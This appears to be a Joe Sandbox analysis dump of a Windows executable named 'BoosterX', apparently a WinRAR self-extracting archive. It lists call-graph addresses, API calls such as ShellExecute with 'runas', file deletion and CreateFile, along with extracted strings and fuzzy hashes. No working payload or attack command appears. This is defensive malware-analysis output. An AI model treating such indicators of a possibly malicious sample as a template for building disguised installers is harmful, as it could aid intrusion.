7ff6c037f6d5 26517->26524 26518->26522 26526 7ff6c037f87b 26518->26526 26519->26517 26521 7ff6c035129c 33 API calls 26519->26521 26520 7ff6c037f70e 
26639 7ff6c037fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26520->26639 26525 7ff6c037f697 26521->26525 26522->26505 26523 7ff6c037f763 CloseHandle 26527 7ff6c037f781 26523->26527 26528 7ff6c037f772 26523->26528 26524->26520 26524->26523 26533 7ff6c037f701 ShowWindow 26524->26533 26638 7ff6c0365b20 53 API calls 2 library calls 26525->26638 26530 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26526->26530 26527->26518 26538 7ff6c037f7b7 ShowWindow 26527->26538 26640 7ff6c0371344 CompareStringW 26528->26640 26531 7ff6c037f880 26530->26531 26533->26520 26535 7ff6c037f6a5 26537 7ff6c0351fa0 31 API calls 26535->26537 26536 7ff6c037f726 26536->26523 26540 7ff6c037f734 GetExitCodeProcess 26536->26540 26539 7ff6c037f6af 26537->26539 26538->26518 26539->26517 26540->26523 26541 7ff6c037f747 26540->26541 26541->26523 26542->25898 26543->25898 26544->25898 26545->25898 26546->25898 26547->25898 26548->25898 26549->25898 26550->25898 26552 7ff6c0363d1b 26551->26552 26553 7ff6c0363d1e SetFileAttributesW 26551->26553 26552->26553 26554 7ff6c0363d34 26553->26554 26561 7ff6c0363db5 26553->26561 26556 7ff6c03669cc 49 API calls 26554->26556 26555 7ff6c03822a0 _handle_error 8 API calls 26557 7ff6c0363dca 26555->26557 26558 7ff6c0363d59 26556->26558 26557->25898 26559 7ff6c0363d5d SetFileAttributesW 26558->26559 26560 7ff6c0363d7c 26558->26560 26559->26560 26560->26561 26562 7ff6c0363dda 26560->26562 26561->26555 26563 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26562->26563 26564 7ff6c0363ddf 26563->26564 26565->25898 26567 7ff6c03672aa 26566->26567 26641 7ff6c035b3b8 26567->26641 26570->25898 26572 7ff6c03631a7 DeleteFileW 26571->26572 26573 7ff6c03631a4 26571->26573 26574 7ff6c03631bd 26572->26574 26575 7ff6c036323c 26572->26575 26573->26572 26576 7ff6c03669cc 49 API calls 26574->26576 26577 7ff6c03822a0 _handle_error 8 API calls 26575->26577 26578 7ff6c03631e2 26576->26578 26579 7ff6c0363251 26577->26579 26580 
7ff6c03631e6 DeleteFileW 26578->26580 26581 7ff6c0363203 26578->26581 26579->25898 26580->26581 26581->26575 26582 7ff6c0363261 26581->26582 26583 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26582->26583 26584 7ff6c0363266 26583->26584 26586->25898 26587->25898 26588->25898 26589->25898 26591 7ff6c0367dcc 26590->26591 26592 7ff6c0367de3 26591->26592 26593 7ff6c0367e15 26591->26593 26595 7ff6c035129c 33 API calls 26592->26595 26645 7ff6c035704c 47 API calls memcpy_s 26593->26645 26597 7ff6c0367e07 26595->26597 26596 7ff6c0367e1a 26597->25898 26598->25898 26599->25898 26602 7ff6c036d21a 26600->26602 26601 7ff6c036d24d 26601->26025 26602->26601 26603 7ff6c0351744 33 API calls 26602->26603 26603->26602 26604->25922 26605->25926 26607->25892 26608->25895 26609->25899 26610->25950 26611->25940 26613->25943 26615->26462 26616->26471 26617->26483 26619 7ff6c036badb 26618->26619 26620 7ff6c036bb17 26619->26620 26622 7ff6c036b928 26619->26622 26620->26500 26623 7ff6c036b952 memcpy_s 26622->26623 26625 7ff6c036b9f8 26623->26625 26626 7ff6c036b9c4 GetProcAddressForCaller GetProcAddress 26623->26626 26624 7ff6c036ba86 GetCurrentProcessId 26627 7ff6c036ba67 26624->26627 26625->26624 26628 7ff6c036ba2a 26625->26628 26626->26625 26627->26620 26628->26627 26634 7ff6c035b67c 99 API calls _handle_error 26628->26634 26630 7ff6c036ba52 26635 7ff6c035ba60 99 API calls 3 library calls 26630->26635 26632 7ff6c036ba5a 26636 7ff6c035b674 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 26632->26636 26634->26630 26635->26632 26636->26627 26637->26509 26638->26535 26639->26536 26640->26527 26643 7ff6c035b402 __scrt_get_show_window_mode 26641->26643 26642 7ff6c03822a0 _handle_error 8 API calls 26644 7ff6c035b4c6 26642->26644 26643->26642 26644->25898 26645->26596 26680 7ff6c03686ac 26646->26680 26648 7ff6c035e3d4 26686 7ff6c035e610 31 API calls memcpy_s 26648->26686 26650 7ff6c035e4e4 26651 7ff6c0382150 33 API calls 26650->26651 26654 7ff6c035e500 26651->26654 
26652 7ff6c035e559 26655 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26652->26655 26653 7ff6c035e464 26653->26650 26653->26652 26687 7ff6c03730c8 102 API calls 26654->26687 26656 7ff6c035e55e 26655->26656 26659 7ff6c03618c5 26656->26659 26661 7ff6c036187a 26656->26661 26663 7ff6c0351fa0 31 API calls 26656->26663 26658 7ff6c035e52d 26660 7ff6c03822a0 _handle_error 8 API calls 26658->26660 26659->26041 26662 7ff6c035e53d 26660->26662 26661->26659 26664 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26661->26664 26662->26041 26663->26656 26665 7ff6c03618f3 26664->26665 26668 7ff6c035e7fa 26666->26668 26667 7ff6c035e8b1 26678 7ff6c035e910 26667->26678 26695 7ff6c035f588 26667->26695 26668->26667 26669 7ff6c035e874 26668->26669 26688 7ff6c0363e88 26668->26688 26669->26667 26671 7ff6c035e9a3 26669->26671 26672 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26671->26672 26675 7ff6c035e9a8 26672->26675 26673 7ff6c035e965 26674 7ff6c03822a0 _handle_error 8 API calls 26673->26674 26677 7ff6c035e98e 26674->26677 26677->26043 26678->26673 26731 7ff6c03528a4 82 API calls 2 library calls 26678->26731 26681 7ff6c03686ca 26680->26681 26682 7ff6c0382150 33 API calls 26681->26682 26684 7ff6c03686ef 26682->26684 26683 7ff6c0382150 33 API calls 26685 7ff6c0368719 26683->26685 26684->26683 26685->26648 26686->26653 26687->26658 26689 7ff6c036728c 8 API calls 26688->26689 26690 7ff6c0363ea1 26689->26690 26694 7ff6c0363ecf 26690->26694 26732 7ff6c036407c 26690->26732 26693 7ff6c0363eba FindClose 26693->26694 26694->26668 26696 7ff6c035f5a8 _snwprintf 26695->26696 26771 7ff6c0352950 26696->26771 26699 7ff6c035f5dc 26704 7ff6c035f60c 26699->26704 26786 7ff6c03533e4 26699->26786 26702 7ff6c035f608 26702->26704 26818 7ff6c0353ad8 26702->26818 27034 7ff6c0352c54 26704->27034 26710 7ff6c035f7db 26828 7ff6c035f8b4 26710->26828 26711 7ff6c0358d04 33 API calls 26713 7ff6c035f672 26711->26713 27054 7ff6c03678d8 48 API calls 2 library calls 26713->27054 
26715 7ff6c035f687 26716 7ff6c0363e88 55 API calls 26715->26716 26721 7ff6c035f6bd 26716->26721 26718 7ff6c035f852 26718->26704 26849 7ff6c03569f8 26718->26849 26860 7ff6c035f940 26718->26860 26724 7ff6c035f8aa 26721->26724 26725 7ff6c035f75d 26721->26725 26726 7ff6c0363e88 55 API calls 26721->26726 27055 7ff6c03678d8 48 API calls 2 library calls 26721->27055 26727 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26724->26727 26725->26710 26725->26724 26728 7ff6c035f8a5 26725->26728 26726->26721 26730 7ff6c035f8b0 26727->26730 26729 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26728->26729 26729->26724 26731->26673 26733 7ff6c03640b9 FindFirstFileW 26732->26733 26734 7ff6c0364192 FindNextFileW 26732->26734 26736 7ff6c03641b3 26733->26736 26738 7ff6c03640de 26733->26738 26734->26736 26737 7ff6c03641a1 GetLastError 26734->26737 26739 7ff6c03641d1 26736->26739 26741 7ff6c03520b0 33 API calls 26736->26741 26757 7ff6c0364180 26737->26757 26740 7ff6c03669cc 49 API calls 26738->26740 26744 7ff6c035129c 33 API calls 26739->26744 26743 7ff6c0364104 26740->26743 26741->26739 26742 7ff6c03822a0 _handle_error 8 API calls 26745 7ff6c0363eb4 26742->26745 26746 7ff6c0364127 26743->26746 26747 7ff6c0364108 FindFirstFileW 26743->26747 26748 7ff6c03641fb 26744->26748 26745->26693 26745->26694 26746->26736 26749 7ff6c036416f GetLastError 26746->26749 26751 7ff6c03642d4 26746->26751 26747->26746 26758 7ff6c0368050 26748->26758 26749->26757 26753 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26751->26753 26754 7ff6c03642da 26753->26754 26755 7ff6c03642cf 26756 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26755->26756 26756->26751 26757->26742 26759 7ff6c0368065 26758->26759 26762 7ff6c0368148 26759->26762 26761 7ff6c0364209 26761->26755 26761->26757 26763 7ff6c03682e6 26762->26763 26766 7ff6c036817a 26762->26766 26770 7ff6c035704c 47 API calls memcpy_s 26763->26770 26765 7ff6c03682eb 26768 7ff6c0368194 memcpy_s 26766->26768 
26769 7ff6c0365864 33 API calls 2 library calls 26766->26769 26768->26761 26769->26768 26770->26765 26772 7ff6c035296c 26771->26772 26773 7ff6c03686ac 33 API calls 26772->26773 26774 7ff6c035298d 26773->26774 26775 7ff6c0382150 33 API calls 26774->26775 26779 7ff6c0352ac2 26774->26779 26777 7ff6c0352ab0 26775->26777 26777->26779 27056 7ff6c03591c8 26777->27056 27063 7ff6c0364cc4 26779->27063 26781 7ff6c0362c68 27095 7ff6c0362480 26781->27095 26783 7ff6c0362c85 26783->26699 27114 7ff6c0362890 26786->27114 26787 7ff6c0353674 27133 7ff6c03528a4 82 API calls 2 library calls 26787->27133 26788 7ff6c0353431 __scrt_get_show_window_mode 26796 7ff6c035344e 26788->26796 26799 7ff6c0353601 26788->26799 27119 7ff6c0362b70 26788->27119 26790 7ff6c03569f8 132 API calls 26792 7ff6c0353682 26790->26792 26792->26790 26793 7ff6c035370c 26792->26793 26792->26799 26812 7ff6c0362a60 101 API calls 26792->26812 26798 7ff6c0353740 26793->26798 26793->26799 27134 7ff6c03528a4 82 API calls 2 library calls 26793->27134 26795 7ff6c03535cb 26795->26796 26797 7ff6c03535d7 26795->26797 26796->26787 26796->26792 26797->26799 26801 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26797->26801 26798->26799 26800 7ff6c035384d 26798->26800 26814 7ff6c0362b70 101 API calls 26798->26814 26799->26702 26800->26799 26803 7ff6c03520b0 33 API calls 26800->26803 26804 7ff6c0353891 26801->26804 26802 7ff6c03534eb 26802->26795 27128 7ff6c0362a60 26802->27128 26803->26799 26804->26702 26806 7ff6c03569f8 132 API calls 26807 7ff6c035378e 26806->26807 26807->26806 26808 7ff6c0353803 26807->26808 26815 7ff6c0362a60 101 API calls 26807->26815 26810 7ff6c0362a60 101 API calls 26808->26810 26810->26800 26811 7ff6c0362890 104 API calls 26811->26802 26812->26792 26813 7ff6c0362890 104 API calls 26813->26795 26814->26807 26815->26807 26819 7ff6c0353b55 26818->26819 26820 7ff6c0353af9 26818->26820 26821 7ff6c03822a0 _handle_error 8 API calls 26819->26821 27146 7ff6c0353378 26820->27146 26823 7ff6c0353b67 
26821->26823 26823->26710 26823->26711 26825 7ff6c0353b6c 26826 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26825->26826 26827 7ff6c0353b71 26826->26827 27373 7ff6c036882c 26828->27373 26830 7ff6c035f8ca 27377 7ff6c036eee0 GetSystemTime SystemTimeToFileTime 26830->27377 26833 7ff6c0370914 26834 7ff6c03802c0 26833->26834 26835 7ff6c0367db4 47 API calls 26834->26835 26836 7ff6c03802f3 26835->26836 26837 7ff6c036aaa0 48 API calls 26836->26837 26838 7ff6c0380307 26837->26838 26839 7ff6c036da14 48 API calls 26838->26839 26840 7ff6c0380317 26839->26840 26841 7ff6c0351fa0 31 API calls 26840->26841 26842 7ff6c0380322 26841->26842 27386 7ff6c037fbe8 49 API calls 2 library calls 26842->27386 26844 7ff6c0380338 26845 7ff6c0351fa0 31 API calls 26844->26845 26846 7ff6c0380343 26845->26846 26847 7ff6c03822a0 _handle_error 8 API calls 26846->26847 26848 7ff6c0380350 26847->26848 26848->26718 26850 7ff6c0356a0a 26849->26850 26851 7ff6c0356a0e 26849->26851 26850->26718 26859 7ff6c0362b70 101 API calls 26851->26859 26852 7ff6c0356a1b 26853 7ff6c0356a3e 26852->26853 26854 7ff6c0356a2f 26852->26854 27449 7ff6c0355138 130 API calls 2 library calls 26853->27449 26854->26850 27387 7ff6c0355e2c 26854->27387 26857 7ff6c0356a3c 26857->26850 27450 7ff6c035466c 82 API calls 26857->27450 26859->26852 26861 7ff6c035f988 26860->26861 26867 7ff6c035f9c0 26861->26867 26919 7ff6c035fa44 26861->26919 27565 7ff6c03760ac 137 API calls 3 library calls 26861->27565 26863 7ff6c0361141 26864 7ff6c0361146 26863->26864 26865 7ff6c0361199 26863->26865 26864->26919 27613 7ff6c035dd18 179 API calls 26864->27613 26865->26919 27614 7ff6c03760ac 137 API calls 3 library calls 26865->27614 26866 7ff6c03822a0 _handle_error 8 API calls 26868 7ff6c036117c 26866->26868 26867->26863 26871 7ff6c035f9e0 26867->26871 26867->26919 26868->26718 26871->26919 27480 7ff6c0359bb0 26871->27480 26873 7ff6c035fae6 27493 7ff6c0365eb8 26873->27493 26876 7ff6c035fb8a 27033 7ff6c0362a60 101 API calls 26876->27033 26878 
7ff6c035fb6e 26878->26876 27567 7ff6c0367c54 47 API calls 2 library calls 26878->27567 26880 7ff6c035fd27 26886 7ff6c035fdcc 26880->26886 26887 7ff6c035fde9 26880->26887 26891 7ff6c0360f9e 26880->26891 26882 7ff6c035fcda 27568 7ff6c0365a68 33 API calls 26882->27568 26885 7ff6c035fbe7 26885->26880 26885->26882 26889 7ff6c03520b0 33 API calls 26885->26889 26889->26882 26919->26866 27033->26885 27036 7ff6c0352c74 27034->27036 27038 7ff6c0352c88 27034->27038 27035 7ff6c0351fa0 31 API calls 27040 7ff6c0352ca1 27035->27040 27036->27038 27708 7ff6c0352d80 108 API calls _invalid_parameter_noinfo_noreturn 27036->27708 27038->27035 27041 7ff6c0352d64 27040->27041 27692 7ff6c0353090 31 API calls _invalid_parameter_noinfo_noreturn 27040->27692 27043 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27041->27043 27042 7ff6c0352d08 27693 7ff6c0353090 31 API calls _invalid_parameter_noinfo_noreturn 27042->27693 27045 7ff6c0352d7c 27043->27045 27046 7ff6c0352d14 27047 7ff6c0351fa0 31 API calls 27046->27047 27048 7ff6c0352d20 27047->27048 27694 7ff6c036874c 27048->27694 27054->26715 27055->26721 27073 7ff6c0365664 27056->27073 27058 7ff6c03591df 27076 7ff6c036b744 27058->27076 27062 7ff6c0359383 27062->26779 27064 7ff6c0364cf2 __scrt_get_show_window_mode 27063->27064 27091 7ff6c0364b6c 27064->27091 27066 7ff6c0364d14 27067 7ff6c0364d50 27066->27067 27069 7ff6c0364d6e 27066->27069 27068 7ff6c03822a0 _handle_error 8 API calls 27067->27068 27070 7ff6c0352b32 27068->27070 27071 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27069->27071 27070->26699 27070->26781 27072 7ff6c0364d73 27071->27072 27082 7ff6c03656a8 27073->27082 27077 7ff6c03513a4 33 API calls 27076->27077 27078 7ff6c0359365 27077->27078 27079 7ff6c0359a28 27078->27079 27080 7ff6c03656a8 2 API calls 27079->27080 27081 7ff6c0359a36 27080->27081 27081->27062 27083 7ff6c03656be __scrt_get_show_window_mode 27082->27083 27086 7ff6c036eb20 27083->27086 27089 7ff6c036ead4 GetCurrentProcess 
GetProcessAffinityMask 27086->27089 27090 7ff6c036569e 27089->27090 27090->27058 27092 7ff6c0364be7 27091->27092 27094 7ff6c0364bef memcpy_s 27091->27094 27093 7ff6c0351fa0 31 API calls 27092->27093 27093->27094 27094->27066 27096 7ff6c03624bd CreateFileW 27095->27096 27098 7ff6c036256e GetLastError 27096->27098 27107 7ff6c036262e 27096->27107 27099 7ff6c03669cc 49 API calls 27098->27099 27100 7ff6c036259c 27099->27100 27101 7ff6c03625a0 CreateFileW GetLastError 27100->27101 27106 7ff6c03625ec 27100->27106 27101->27106 27102 7ff6c0362671 SetFileTime 27105 7ff6c036268f 27102->27105 27103 7ff6c03626c8 27104 7ff6c03822a0 _handle_error 8 API calls 27103->27104 27108 7ff6c03626db 27104->27108 27105->27103 27109 7ff6c03520b0 33 API calls 27105->27109 27106->27107 27110 7ff6c03626f6 27106->27110 27107->27102 27107->27105 27108->26783 27113 7ff6c035b7f8 99 API calls 2 library calls 27108->27113 27109->27103 27111 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 27110->27111 27112 7ff6c03626fb 27111->27112 27113->26783 27115 7ff6c03628b6 27114->27115 27117 7ff6c03628bd 27114->27117 27115->26788 27117->27115 27118 7ff6c03622e0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27117->27118 27135 7ff6c035b8b4 99 API calls Concurrency::cancel_current_task 27117->27135 27118->27117 27120 7ff6c0362ba9 27119->27120 27121 7ff6c0362b8d 27119->27121 27122 7ff6c03534cc 27120->27122 27124 7ff6c0362bc1 SetFilePointer 27120->27124 27121->27122 27136 7ff6c035b9d4 99 API calls Concurrency::cancel_current_task 27121->27136 27122->26811 27124->27122 27125 7ff6c0362bde GetLastError 27124->27125 27125->27122 27126 7ff6c0362be8 27125->27126 27126->27122 27137 7ff6c035b9d4 99 API calls Concurrency::cancel_current_task 27126->27137 27138 7ff6c0362738 27128->27138 27131 7ff6c03535a7 27131->26795 27131->26813 27133->26799 27134->26798 27139 7ff6c0362749 _snwprintf 27138->27139 27140 7ff6c0362850 SetFilePointer 27139->27140 27144 7ff6c0362775 27139->27144 27142 7ff6c0362878 
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
                                                    • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                    • API String ID: 255727823-2702805183
                                                    • Opcode ID: 4e057d484052a99d1df3ac008361d9c0b2871c0de1c67f6c49b051274d14bbe8
                                                    • Instruction ID: f1483af4f468b07e08bed65b2fa5d066cf38fd1c89b9a862b22ebee75a0beb7e
                                                    • Opcode Fuzzy Hash: 4e057d484052a99d1df3ac008361d9c0b2871c0de1c67f6c49b051274d14bbe8
                                                    • Instruction Fuzzy Hash: 0AD2B522A18A83A1FA209F69E8542F96361FF85786F504536DACDC77E6DF3CE644C700
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
                                                    • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                    • API String ID: 3007431893-3916287355
                                                    • Opcode ID: 1243c9d58e10b0f9c1e69fe8408d6eda55fcce4eaed4e803da273c064c99ea82
                                                    • Instruction ID: 0a98439ec0370b38cf958f30d108c576cbacdc658f17b5e575fec85841ee110b
                                                    • Opcode Fuzzy Hash: 1243c9d58e10b0f9c1e69fe8408d6eda55fcce4eaed4e803da273c064c99ea82
                                                    • Instruction Fuzzy Hash: 8713BF22B04B83E9EB109F68D9442EC27B1EB44799F501636DA9DD7BE9DF38E184C340

                                                    Control-flow Graph (rendered graph omitted; node list not reproducible as text)
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                    • API String ID: 1048086575-3710569615
                                                    • Opcode ID: bb87de0c1b01ed3e0ea964dee26a773d15bb5b82cbf9db583fa815d9bf748bf7
                                                    • Instruction ID: c7ae58a19ba21a41a10e992d4b8bf3cc165ce62ac5561cf0ec33e9e7ff022734
                                                    • Opcode Fuzzy Hash: bb87de0c1b01ed3e0ea964dee26a773d15bb5b82cbf9db583fa815d9bf748bf7
                                                    • Instruction Fuzzy Hash: AE128E31A18B83A1EB109F68E8452B96361FF85786F505236DADDC7BA6EF3CE144C740

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                    • String ID: $%s:$CAPTION
                                                    • API String ID: 2100155373-404845831
                                                    • Opcode ID: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                                    • Instruction ID: 84114a8db43967562bff8f2297072c8e2642d1cb120668f3c18564c69822c3ba
                                                    • Opcode Fuzzy Hash: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                                    • Instruction Fuzzy Hash: 37910632B18A5396E718DF39E80066A67A1FB85785F545535EE8EC7B98CF3CE805CB00

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                    • String ID: PNG
                                                    • API String ID: 211097158-364855578
                                                    • Opcode ID: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                                    • Instruction ID: 414b61d1112af6e09852e22318751e9efd3796943ebc9097f0755d4861bd6a31
                                                    • Opcode Fuzzy Hash: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                                    • Instruction Fuzzy Hash: AB413C25A09B47A2EF149F5AE54437963A0BF88BD6F140535CE8EC77A4EF7CE4498700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: __tmp_reference_source_
                                                    • API String ID: 3668304517-685763994
                                                    • Opcode ID: cecce41aa2bc7ce1222cb977a108751a8b352f261223467f6b66be6f95fb3764
                                                    • Instruction ID: 17337cfc50a1267f5bfd8713a3bf5e3e2939094433809ea2151e3bae86819f8e
                                                    • Opcode Fuzzy Hash: cecce41aa2bc7ce1222cb977a108751a8b352f261223467f6b66be6f95fb3764
                                                    • Instruction Fuzzy Hash: 18D29D66A08AC3A6EA648F25E5413AEB7A1FB81785F444132DBDDC77A6CF3CE454C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: CMT
                                                    • API String ID: 3668304517-2756464174
                                                    • Opcode ID: b604c9a845cf12cf003dbce948390fa4b7da71dc3bf0753df9959c8a9c66759f
